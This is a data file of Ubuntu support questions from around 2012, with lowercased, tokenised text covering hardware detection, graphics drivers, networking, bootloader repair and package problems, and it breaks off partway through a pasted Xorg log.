124632	what would cause ssd to become not detectable ?	i recently purchased an intel 520 120gb ssd and installed ubuntu on it . occasionally my system will freeze and i will have to alt-print screen-reisub to reboot . sometimes it will reboot and work just fine . other times it just hangs at a flashing prompt . if i boot from a live usb i can run boot-repair and it will usually reboot fine the next go round . i have noticed today that when i am running the live usb and open nautilus my ssd partitions will sporadically disappear and reappear . even if they are mounted . i was thinking it was a poor connection , but i have tried a different sata cable and a different sata port . is it possible i have a faulty ssd , or is there something different you have to do with ssds to make sure they stay mounted ( i was thinking like it has some sort of goofy power savings feature that needs to be disabled ) . i found the place in the bios where the sata ports are listed . they are all set to ahci ( chipset - sata mode = ahci ) the unmounting/remounting happens all the time . i think this is the relevant part of the syslog : http : //pastebin.com/wxhdraaq
124636	restarting lightdm after running nvidia-xconfig results in unresponsive text-only display	so , for awhile i 've been trying to get my external display to work . i 'm running a nvidia geforce 305m graphics card in a lenovo ideapad u460s . but when i open nvidia x settings ( ubuntu 11.10 btw ) a window pops up saying that i do not have the nvidia x driver installed and running and to run `` nvidia-xconfig '' ( or whatever it says ) as root , and then restart the x server . so i open the terminal and run command : sudo nvidia-xconfig terminal does it 's thing ... and then i run this command ( based on answers on this site ) : sudo service lightdm restart then the ubuntu desktop/ui/blah blah blah shuts off , screen goes black and then white text appears on the screen like so : *pulseaudio configured for per-user sessions saned disabled : edit /etc/default/saned [ ok ] *starting anac ( h ) ronistic cron [ ok ] *stopping anac ( h ) cronistic cron [ ok ] *stopping cold plug devices [ ok ] *stopping log initial device creation [ ok ] *starting configure virtual network devices [ ok ] *starting configure network device security [ ok ] *stopping configure virtual network devices *checking battery state ... *stopping system v runlevel compatibillity [ ok ] i have no idea what this screen is . i am capable of typing in it , though typed commands ( terminal command lines ) wo n't work ( at least none that i 've tried , but what do i know haha ? ) anyways ... any help with this would be greatly appreciated , i am fairly new to ubuntu and i love it so far , i would love it even more if i could get my peripheral hardware up and running ( ie my secondary monitor )
124640	how to upgrade intel graphics package ?	i have a intel i7 laptop that does not show any resolution higher than 1280 x 1024 . a little bit of research pointed me to a bug and subsequently to a fix . i have 11.10 currently installed . i want to upgrade the driver so that the graphics start working again . how can i do this ? bug release with fix
124643	how to query the motherboard/mainboard number ?	i have a pc with a an old amd sempron 3000+ processor on which i wan na query the motherboard aka mainboard model number to check which kind of ram to buy for it . how do i do this in ubuntu 11.10 ?
124646	can not resolve custom domains when vpn is up	i just upgraded to 12.04 from 11.10 , and now i ca n't resolve custom domains over my vpn ( e.g . *.dev.local ) . it worked splendid before the upgrade . both my /etc/resolv.conf and route -n looks exactly as it did before the update . i am using openvpn and it connects without problem . output from ping $ ping example.dev.local ping : unknown host example.dev.local resolv.conf nameserver 172.16.1.4 nameserver 172.16.1.5 nameserver 10.4.180.250 search office.local corp.local route -n # route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.4.180.250 0.0.0.0 ug 0 0 0 eth0 10.4.180.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 10.61.80.0 172.28.0.254 255.255.255.128 ug 0 0 0 tap0 10.61.80.128 172.28.0.249 255.255.255.128 ug 0 0 0 tap0 10.200.2.126 172.28.0.249 255.255.255.255 ugh 0 0 0 tap0 81.92.65.52 172.28.0.249 255.255.255.255 ugh 0 0 0 tap0 81.92.71.128 172.28.0.249 255.255.255.192 ug 0 0 0 tap0 81.92.72.128 172.28.0.254 255.255.255.224 ug 0 0 0 tap0 81.92.72.160 172.28.0.249 255.255.255.224 ug 0 0 0 tap0 172.16.0.0 172.28.0.1 255.255.248.0 ug 0 0 0 tap0 172.28.0.0 0.0.0.0 255.255.254.0 u 0 0 0 tap0 snippet from /etc/dhcp3/dhclient.conf ( 22-25 is original before upgrade , previously had to remove domain-name-servers for some reason i 've forgotten about ) 22 # request subnet-mask , broadcast-address , time-offset , routers , 23 # domain-name , domain-name-servers , domain-search , host-name , 24 # netbios-name-servers , netbios-scope , interface-mtu , 25 # rfc3442-classless-static-routes , ntp-servers ; 26 27 prepend domain-name-servers 192.168.1.1 ; 28 request subnet-mask , broadcast-address , time-offset , routers , 29 domain-name , domain-search , host-name , 30 netbios-name-servers , netbios-scope , interface-mtu , 31 rfc3442-classless-static-routes , ntp-servers ; any help would be greatly appreciated . edit : i can reach the hosts by ip , it 's just the resolving that does not work .
124648	how to install a new d-link nic in ubuntu 11.04 server ?	i did a new fresh installation of ubuntu 11.04 server . i plugged a new d-link nic ( dfe528tx ) but it does n't work properly . how could i fix this problem ?
124651	vuze is not opening once it is closed in ubuntu 11.04 ?	i have installed vuze on ubuntu 11.04.everything is working fine.but when i close vuze and try to reopen it , it wo n't open . if i restart the system and try opening vuze it would open normally . so can someone tell me what is the problem here and how to solve this ?
124654	gtkiconview does n't automatically fill the space with icon when user resizes the window	in the ubuntu accomplishments project we are having a few unusual bugs : https : //bugs.launchpad.net/bugs/986708 https : //bugs.launchpad.net/bugs/974728 namely that we have a window with a gtknotebook and a gtkiconview on a page and another on another page . when the user re-sizes the window the iconview does not automatically fill the space with icons ( they stay in their original column layout ) but if the user changes the gtknotebook pages and thus refreshes the icon view the space is taken up as expected . how can we automatically use the space when resizing the window ? what is more concerning though is that when the window appears , we can resize it smaller - it seems as if the iconview is blocking us from resizing and then having a scrollable region for the icons . the code looks like this . the liststores that drive the iconviews : self.trophystore = gtk.liststore ( str , gdkpixbuf.pixbuf , bool , bool , str , str ) # title , icon accomplished , locked , app , accomplishment self.trophystore.set_sort_column_id ( col_title , gtk.sorttype.ascending ) self.trophy_icon.set_model ( self.trophystore ) self.oppstore = gtk.liststore ( str , gdkpixbuf.pixbuf , bool , bool , str , str ) # title , icon , accomplished , locked , app , accomplishment self.oppstore.set_sort_column_id ( col_title , gtk.sorttype.ascending ) self.opp_icon.set_model ( self.oppstore ) self.trophy_icon.set_text_column ( col_title ) self.trophy_icon.set_pixbuf_column ( col_pixbuf ) self.opp_icon.set_text_column ( col_title ) self.opp_icon.set_pixbuf_column ( col_pixbuf ) other than this , we do n't really poke around with the iconviews , we just add content to the liststores to update the views . the code for the project is here - can anyone recommend how we can fix these two issues ?
124657	how does one go about satisfying dependencies for a package in a ppa that rely on packages with binary components ?	simplest explanation of the question is , you ca n't put any binary components on ppa . how does one go about satisfying dependencies for a package they could put on ppa if they could satisfy dependencies ( and possibly how would you satisfy those ) ? it 's kind of similar to this except that i ca n't put the dependencies in the ppa since they rely on some binary components .
124658	is open source software vulnerable to viruses ?	i understand the ideas behind open source software , but i am more interested in the security aspects . how is open source software not exposed to viruses or any kind of internet attack ? how does it stay secure over time ? i have heard that open source software is prone to attacks , but the chances are less than windows-based software . i am unclear about this . and why do some linux users not use an antivirus ?
124669	how can i disable the update prompt ?	how to disable the auto update dialog box shows every time while i am working ? i have applied the following command yesterday but today still that is showing up . is there any other way to permanently forever disable it ? $ gconftool -s -- type bool /apps/update-notifier/auto_launch false
124671	how to fix high power consumption on a hybrid-graphics laptop	i have a hybrid radeon 6600m/intel laptop , and i 've installed the ubuntu beta 2 , hoping that i 'd get a better battery life but i still seem to be getting high power consumption . with radeon blacklisted , i 'm still getting ~23w of power consumption . i get ~5 hours on windows compared to < 2 hours on ubuntu . what can i do to decrease power consumption ?
124672	symbolic links - move files	how can i change symbolic links for targeted files ? ( move targeted files to place where are linked from ) i hope i 'm clear . thank you in advance .
124676	updating libreoffice calc 3.3.4	good day ! how do i update from calc 3.3.4 to 3.5 ? i could n't find a button or option in the program that was related to updates . : ( is there no alternative to uninstalling the whole thing and installing the newer version ?
124679	how do i grant write-permission to a java-program ?	i wrote a java program , which should change my /etc/apt/apt.conf.d/01proxy file . i have a server , which is not always running and i do n't want to manually change the proxy , so i made a graphical program . everything is working , however , only if i change the directory-owner to me instead of root , and i do n't like this ... is there a way to grant superuser write-permission to my java-program ? for example that the window asking for the password is popping up , but not when i start the program , only when i click on the button to change the proxy . the program does the following : look if server is up ( working , without su ) look if proxy is set to server ( working , without su ) set proxy to server / normal ( working , only with su )
124684	unable to see text after installing ambiance-dark sidebar theme	i am using ubuntu 12.04 lts and have installed ambiance dark sidebar theme . now i can see the dark ambiance side bar , but in the main ubuntu window of nautilus i see the orange folders ( ambiance ) but the writing under the folders is almost totally white . how to reestablish the black writing under the folders ?
124685	upgrade to 11.04 completed with errors = no computor	attempting to upgrade from 10.10 to 11.04 . download completed asking questions re samba and cups , defaults selected . download completed with errors . bug report re samaba . would no move forward to 'clean up computer' time elapsed for all this 3-1/2 hours . firefox still worked . shut down screen - script replaced by rectangles to represent letters . close down and reboot , error on screen asking that it be reset to 1680x1050 but no display . the computer is a three year old desktop machine with a 22 '' screen . the operator is much older and has an interest in computing but perhaps the knowledge of a three year old . i can only think to reinstall 10.10 from disc and start again , but would value advice .
124689	will gimp 2.8 ship with ubuntu 12.04 ?	in the software centre , gimp 2.6 is still the available stable release . i 've heard talk about gimp 2.8 being almost ready ( and gimp 2.7 being unstable ) . will ubuntu 12.04 ship with gimp 2.8 ?
124691	how do i listen to an mp3 i uploaded to ubuntu one ?	i do n't have an ubuntu one mp3 music streaming account , which i am assuming is necessary for streaming mp3s that you purchase from the ubuntu store . but what about my personal mp3s i have on my computer and have uploaded to the free 5gig ubuntu one service ? i have uploaded an mp3 to a folder in my ubuntu one auto sync folder on my ubuntu precise computer . i want to listen to that mp3 using my iphone 4 with ios 5 and the ubuntu one app . unfortunately for ubuntu , it looks like i have to download the mp3 through the ubuntu app and then send it to dropbox ( their competition ) in order to listen to it . how can i just listen to the mp3 i uploaded ( not bought from ubuntu ) on my iphone ?
124692	command line tool to crop pdf files	i am looking for an open source command line tool to crop pdf file just like we can do in adobe acrobat pro . i have tried pdftk , imagemagick , pypdf , and ghostscriptâall with no success so far .
124699	why does gnome-terminal freeze when an ssh session gets disconnected ?	this is a very simple problem . i use gnome-terminal to ssh to other machines every day . i do this on a laptop which i carry around the office , so i am constantly switching between wired and wireless networks . when this happens my ssh sessions drops off and the terminal freezes . why does this happen ( the freezing , not the session dropping ) and is their a way to prevent it ? i know i can get around this by logging off from the remote server before i know i want to disconnect my laptop from ethernet . it 's annoying because i have to manually close the terminal session after it has frozen which pops up a dialogue box and i also lose the title of the session - all very time consuming . it would be much better if the ssh session just got killed and it returned me back to the local bash prompt .
124705	how to change gvfs mount point ?	there is a way to change the gvfs mount point which by default is `` ~/.gvfs/ '' ? and by the way how to change the name of mounted folders which by default is `` my folder on myserver.tld '' ?
124711	how do i install gcc 4.7.0 from source ?	i 'm new user in ubuntu & i wonder if anyone can help me to how i can download & build gcc 4.7.0 compile on ubuntu 11.10 safely ? ? so would someone pelase explain it step by step .
124712	interface stopped working when compiz effects are on	i 've been running gnome-classic with compiz effects since the release of 11.10 . today , i rebooted , and the gnome panel , docky window manager , and basically all interface elements stopped loading when i log in . all i see is my desktop wallpaper , and that 's it . so far as i know , i 've made no changes , i certainly did n't make any settings changes for my interface . there might have been some kind up update since i last booted , but that 's about it . i can log out by hitting ctrl+alt+del , and then if i log in again to gnome-classic with no effects , then i have a working system . i know better than to even bother asking why this is happening , becuase this is just life with open source . stuff just changes and breaks randomly and without warning all the time . all i would like to know is : how do i get compiz effects working again ?
124716	some widgets not appearing in `` add widgets '' in kde4 screensaver	i would like to add an rss feed to my screen saver . in kde , the default ( blank ) saver lets you add normal plasma widgets . but the list of widgets available in the screen saver is smaller than the one for the desktop ( it 's otherwise the same interface ) . all the default widgets are there , but lots of custom ones are missing , in particular rssnow and netnewsticker . anyone know why this might be ? i 've tried restarting plasma , and rebooting .
124717	how to write simple web-based application for gnome3 ?	i know , that gnome3 ui uses html and css elements for creating menus and windows . how can i write simple web-based application like some text-editor with own document-format and formatting tools written in js ? html widget , that saves documents to the file-system . main reason of this question - to create text editor , with markdown support ... gtk file menu : open save as ... webkit content : < link rel= '' stylesheet '' ... > < script src= '' ... '' > < /script > < nav > ... < /nav > < content > { opened file } < /content >
124721	how can i repartition my hard disks ?	i have several bootable hard drives in one pc . hard drive 1 has 2 partitions , both bootable , i want one partition instead hard drive 2 is bootable i want access it as a normal slave/data hard disk and have boot sector removed . disk info looks like this : finn @ finn-desktop : ~ $ di filesystem mount size used avail % used fs type /dev/sda1 / 913,0g 384,8g 481,8g 47 % ext4 udev /dev 2,0g 0,0g 2,0g 0 % devtmpfs /dev/sdb1 /media/5e66f3fc 892,6g 178,5g 668,7g 25 % ext4 /dev/sdb6 /media/88517f79 22,3g 9,1g 12,1g 46 % ext4 /dev/sdc1 /media/a1ee36ce 455,5g 0,9g 431,4g 5 % ext4 tmpfs /run 801,6m 0,8m 800,8m 0 % tmpfs
124726	dos programs in wine	i know that dosbox is not yet integrated with wine , but whenever i double click on a dos program ( with wine ) it just opens dosbox and closes it in the next moment . why does this happen ? here is the terminal output : tachyonsos @ tachyons-desktop : ~ $ wine '/home/tachyonsos/desktop/tc.exe ' dosbox version 0.74 copyright 2002-2010 dosbox team , published under gnu gpl . -- - config : loading primary settings from config file /home/tachyonsos/.wine/dosdevices/c : /users/tachyonsos/temp/cfg1453.tmp mixer : got different values from sdl : freq 44100 , blocksize 512 alsa : ca n't subscribe to midi port ( 65:0 ) nor ( 17:0 ) midi : opened device : none btw is it a bug ? linked question how to run a ms-dos application in wine ?
124727	why does thunderbird keep telling me it 's going to expire ?	why does thunderbird keep telling me it 's going to expire ? should n't ubuntu automatically update to the latest version ? my version of thunderbird is version 3.1.20 . it 's the default one that i selected when i installed ubuntu .
124731	when will octave 3.6.1 be available to be installed ?	at this point , octave 3.2 is the version available for directly installation in ubuntu 12.04 . but latest stable octave is 3.6.1 now . will octave 3.6.1 be packaged for ubuntu 12.04 ?
124736	is there a wubi installer for the ubuntu dvd version ?	these days my heart pumps more blood to itself because of ubuntu 12.04 release . i would like to download it about two or three days later.we know there is a wubi for the cd version included . i want to know , is there a wubi installer for the ubuntu dvd version ? and what will be the size of the dvd image ? 4.7gb ?
124744	advanced terminal emulation	would there be a way to emulate the desktop as a terminal i.e . xterm , so you can type in bash on the desktop ? i want some form of window manager that does that exactly .
124746	is ubuntu desktop free for a business solution ?	is ubuntu desktop free for business platforms ? has ubuntu changed its conditions about using the os for profit purposes ?
124749	how to install slingshot launcher	how to install slingshot launcher in ubuntu .is there any ppa available for it ?
124757	unknown filesystem error : grub rescue	after using testdisk 6.11 , i got the error message : unknown filesystem error : grub rescue to fix it , i used boot-repair , but it took too long - hours ! ( i had to go to sleep and return ( : ) so , is there other way to fix it faster ? thanks !
124759	customize ubuntu for a library internet kiosk	i would like to customize ubuntu for a library , they only want to display a web browser with their site in full screen . no address bar , no button user can only click the link on the page . if library 's staff enter admin user name and password they can change any settings in ubuntu . any suggestion or usefully link is much appreciated .
124763	wireless shows up as disabled on a bcm4312 wireless card	i 'm using ubuntu 11.10 ( dual booted with windows vista ) but i 'm unable to access internet wirelessly even though i can do so on vista . the output for rfkill list all is : 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked the output for lshw -c network is : *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 03 serial : 00:24 : e8 : c2:20 : c9 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168d-1.fw ip=192.168.0.104 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:46 ioport:3000 ( size=256 ) memory : f6004000-f6004fff memory : f6000000-f6003fff memory : f6020000-f603ffff *-network disabled description : wireless interface product : bcm4312 802.11b/g lp-phy broadcom sta wireless driver is installed , activated , and currently in use my laptop is a dell vostro 1520
124770	network manager keeps asking for login information with a centrino ultimate-n 6300 wireless card	i am having problems with wireless connections when i start my computer back up from standby after a while of it being in standby , and sometimes regular power up from full off as well though less often . the problem is that when connecting to the networks it will not connect and keep asking me for my login information over and over again . one sort of fix that i found , but it does n't work all the time , is to switch to a different network that i do n't have on my network list already try to connect to that wait for it to fail then switch back to the network i really wanted and it seems to get the connection , however again this only sometimes works . so i 'm wondering if this is a known problem or if its just me . lspci below : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:19.0 ethernet controller : intel corporation 82577lm gigabit network connection ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gt218 [ nvs 3100m ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 03:00.0 network controller : intel corporation centrino ultimate-n 6300 ( rev 35 ) 0d:00.0 sd host controller : ricoh co ltd mmc/sd host controller ( rev 01 ) 0d:00.1 system peripheral : ricoh co ltd memory stick host controller ( rev 01 ) 0d:00.3 firewire ( ieee 1394 ) : ricoh co ltd firewire host controller ( rev 01 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) on ubuntu 11.10
124773	why does ubuntu force users to create a password upon installation ?	there 's been one problem i 've had since i installed ubuntu to run alongside windows , i assume this would also be the same if it was installed to replace the other operating system as well , the installer prompts you to create a password upon typing in the user account name and if you do n't put in a password and just put in the user account name , it ends up saying to create a password . my comparison is in windows and mac os x , you are never forced to create a password . if you remove the password on your admin account in system settings > user accounts , you wo n't be able to authenticate whenever you try to install something , because it requests for a password and putting in no password at all is n't going to work , it will just act as if you put in an invalid password . this is what i call `` getting locked out of privileges '' . i 'm finding the `` authenticate '' window that comes up whenever you install something or accessing somewhere a nuisance , 'cause it always requests for your password . so my question is - why does ubuntu force users to create a password upon installation ?
124774	how do i vertically flip my webcam 's image ?	my usb webcam is precariously mounted on the desk i 'm using . the clamp damages my monitor ; better lighting etc . etc . works like a charm but all that is needed is to vertically flip the picture for use in skype , g+ hangouts etc . i am at a loss as to how this is accomplished in ubuntu 11.10 . closest i have come is a thread mentioning omitted effects from cheese . i ca n't find anything else on this .
124775	are there alternative repositories for ruby1.8 package in 10.04 ?	i want to upgrade existing ruby 1.8.7 package to patchlevel 300+ revision . official repository version is this one : ruby 1.8.7 ( 2010-01-10 patchlevel 249 ) are there any repositories that provided 1.8.7 updates at some point ? i know about rvm , but i 'd like to have more fresh version to be installed for all users by default .
124779	the network printer will only print blank pages and will not stop . what should i do ?	i work in a library , so we have a ricoh printer that is networked between all of us . i just recently installed ubuntu 11.10 64bit on my desktop and have been trying to set up the printer without success . ubuntu found the printer immediately and allowed me to set it up . when i hit test print , i get one sheet with writing on it and then it prints blank pages and will not stop until i turn off the printer . i tried printing from a document and i get the same one page with writing and then all the blank pages again . below is what the page says with writing on it . i 'd appreciate any help anyone is willing to give . thanks . % ! ps-adobe-3.0 % % % % mark ( ) ( ) ( bunch of numbers ) { setuserinfo } stopped cleartomark % % % !
124780	how to create a protocol similar to apt : package ?	i wanted to define a protocol to work similar to `` apt : package '' that works as follows : '' apt '' is associated with the program `` apturl '' that when calling the `` apt : package '' it calls the `` apturl '' passing the `` package '' as a parameter . i need to create a protocol type `` abc '' when typed in the browser called `` abc : package '' it calls a `` script/program '' `` abc-script.sh package '' at 10:04 worked on creating the file /usr/share/gconf/schemas/abc.shemas and running the command gconf-schemas-register abc.shemas basically however now is not more so .
124782	ati graphics card installation on sandy bridge processor	i have dual graphics card ( one that of sandy bridge processor intel hd3000 and another one is of ati hd 6470m ) . i have done since ubuntu 11.04 . every time i install propitiatory catalyst driver i even fail to get basic functionality like ubuntu 3d and so on . just after fresh ubuntu installation the fan of ati card goes wild , so to shutdown ati driver i modprobe to make it off and enable only the integrated graphics card ( intel hd3000 ) . intel hd3000 has come a long way since its bad introduction on linux at the start of sandy bridge release . it is quite functional and the mesa drivers are good enough , but i would love to use the ati one , because then i would be able to install catalyst driver and use it to run high graphics demanding programs . every time i write this in /etc/rc.local to shutdown ati card modprobe radeon echo off > /sys/kernel/debug/vgaswitcheroo/switch i tried different ways to shutdown intel hd300 one but have not been able to do so , till now . is there a solution to this problem ? has anyone been able to solve this any way ? how do people get catalyst driver properly install on a dual card computer like mine ?
124786	how to view ubuntu files from windows ?	how to view ubuntu files from windows . if i cant access ubuntu ( it crashed badly ) . files are important ! please help !
124789	g.726 adpcm codec stopped working in vlc	after upgrading from 11.10 to 12.04 vlc ca n't work with codec g.726 . [ 0x7fbdc80009c8 ] avcodec generic error : can not open codec ( g.726 adpcm audio ) but avplay works fine with this codec . how can i fix it ?
124800	software to add images to video ?	i have video where i want to put images on my hand ( in the video ) and have them fly all over the video screen . is their any software for ubuntu 11.10 to do this or at least to insert an image into the video with a custom position as to where it is placed ?
124811	problems when removing `monodevelop`	when i tried to remove monodevelop , i got these errors : root @ so-so : ~ # sudo apt-get autoremove monodevelop reading package lists ... done building dependency tree reading state information ... done package monodevelop is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 7 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up monodoc-browser ( 2.10-1 ) ... generating monodoc index ... grep : /etc/gre.d/*.conf : no such file or directory unhandled exception : system.typeloadexception : a type load exception has occurred . [ error ] fatal unhandled exception : system.typeloadexception : a type load exception has occurred . dpkg : error processing monodoc-browser ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : monodoc-browser e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i fix this ?
124813	ca n't find the files i had on windows 7 in ubuntu 11.10 with dual boot	i did a dual boot of windows 7 and ubuntu 11.10 . i had a lot of files in the same partition i installed ubuntu in . i ca n't find them now . newbie here . first time with any os other than windows .
124815	how do i enable emacs keybindings in google chrome ?	can anyone tell me how to enable emacs keybind on chrome ? i found some links but they are either not clearly mentioning how to do so or not what i want ( i do n't want external tools to be run for this purpose ) .
124823	how to set up grub to triple boot : ubuntu , windows 7 and joli os ?	i 've a laptop with windows 7 preinstalled . i shrunk windows drive to install ubuntu 12.04 from a live usb . but after installation , i am not seeing the grub menu . how to fix this ? also i will be installing joli os . so i want a grub menu with all the three os 's listed . finally how can i change the order of grub menu after it appears .
124826	updated to 12.04 , xorg wo n't start , using onboard xgi display	just updated one of my servers to 12.04 ( from 10.04 ) , and xorg no longer starts , nor will lightdm or gdm . looking in /var/log/lightdm/x-0.log : x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-23-generic x86_64 ubuntu current operating system : linux murph 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 kernel command line : root=/dev/md0 ro quiet splash build date : 20 april 2012 05:12:02am xorg-server 2:1.11.4-0ubuntu10.1 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : tue apr 24 10:51:50 2012 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( ee ) failed to load module `` xgi '' ( module does not exist , 0 ) ( ee ) failed to load module `` vesa '' ( module does not exist , 0 ) ( ee ) failed to load module `` fbdev '' ( module does not exist , 0 ) ( ee ) failed to load module `` xgi '' ( module does not exist , 0 ) ( ee ) failed to load module `` vesa '' ( module does not exist , 0 ) ( ee ) failed to load module `` fbdev '' ( module does not exist , 0 ) ( ee ) no drivers available . fatal server error : no screens found please consult the the x.org foundation support at http : //wiki.x.org for help . please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log server terminated with error ( 1 ) . closing log file . so it appears to be wanting to use an xgi module for the display , but one is not found . lspci reveals that i do have an xgi on-board card : root @ murph : /etc/modprobe.d # lspci | grep vga 01:03.0 vga compatible controller : xgi technology inc. ( extreme graphics innovation ) z7/z9 ( xg20 core ) here is my /var/log/xorg.0.log : [ 130507.662 ] x.org x server 1.11.3 release date : 2011-12-16 [ 130507.662 ] x protocol version 11 , revision 0 [ 130507.662 ] build operating system : linux 2.6.42-23-generic x86_64 ubuntu [ 130507.662 ] current operating system : linux murph 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 [ 130507.662 ] kernel command line : root=/dev/md0 ro quiet splash [ 130507.662 ] build date : 20 april 2012 05:12:02am [ 130507.662 ] xorg-server 2:1.11.4-0ubuntu10.1 ( for technical support please see http : //www.ubuntu.com/support ) [ 130507.662 ] current version of pixman : 0.24.4 [ 130507.662 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 130507.662 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 130507.662 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : tue apr 24 10:51:50 2012 [ 130507.663 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 130507.697 ] ( == ) no layout section . using the first screen section . [ 130507.697 ] ( == ) no screen section available . using defaults . [ 130507.697 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 130507.697 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 130507.698 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 130507.698 ] ( == ) automatically adding devices [ 130507.698 ] ( == ) automatically enabling devices [ 130507.698 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 130507.698 ] entry deleted from font path . [ 130507.710 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/75dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , /usr/share/fonts/x11/75dpi , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 130507.710 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 130507.710 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 130507.710 ] ( ii ) loader magic : 0x7f5268468b00 [ 130507.710 ] ( ii ) module abi versions : [ 130507.710 ] x.org ansi c emulation : 0.4 [ 130507.711 ] x.org video driver : 11.0 [ 130507.711 ] x.org xinput driver : 16.0 [ 130507.711 ] x.org server extension : 6.0 [ 130507.711 ] ( -- ) pci : * ( 0:1:3:0 ) 18ca:0020:1043:82b4 rev 0 , mem @ 0xf4000000/67108864 , 0xfbdc0000/262144 , i/o @ 0x0000ec00/128 [ 130507.711 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 130507.711 ] ( ii ) loadmodule : `` extmod '' [ 130507.788 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 130507.878 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 130507.878 ] compiled for 1.11.3 , module version = 1.0.0 [ 130507.878 ] module class : x.org server extension [ 130507.878 ] abi class : x.org server extension , version 6.0 [ 130507.878 ] ( ii ) loading extension mit-screen-saver [ 130507.878 ] ( ii ) loading extension xfree86-vidmodeextension [ 130507.878 ] ( ii ) loading extension xfree86-dga [ 130507.900 ] ( ii ) loading extension dpms [ 130507.900 ] ( ii ) loading extension xvideo [ 130507.900 ] ( ii ) loading extension xvideo-motioncompensation [ 130507.900 ] ( ii ) loading extension x-resource [ 130507.900 ] ( ii ) loadmodule : `` dbe '' [ 130507.900 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 130507.905 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 130507.906 ] compiled for 1.11.3 , module version = 1.0.0 [ 130507.906 ] module class : x.org server extension [ 130507.906 ] abi class : x.org server extension , version 6.0 [ 130507.906 ] ( ii ) loading extension double-buffer [ 130507.906 ] ( ii ) loadmodule : `` glx '' [ 130507.906 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 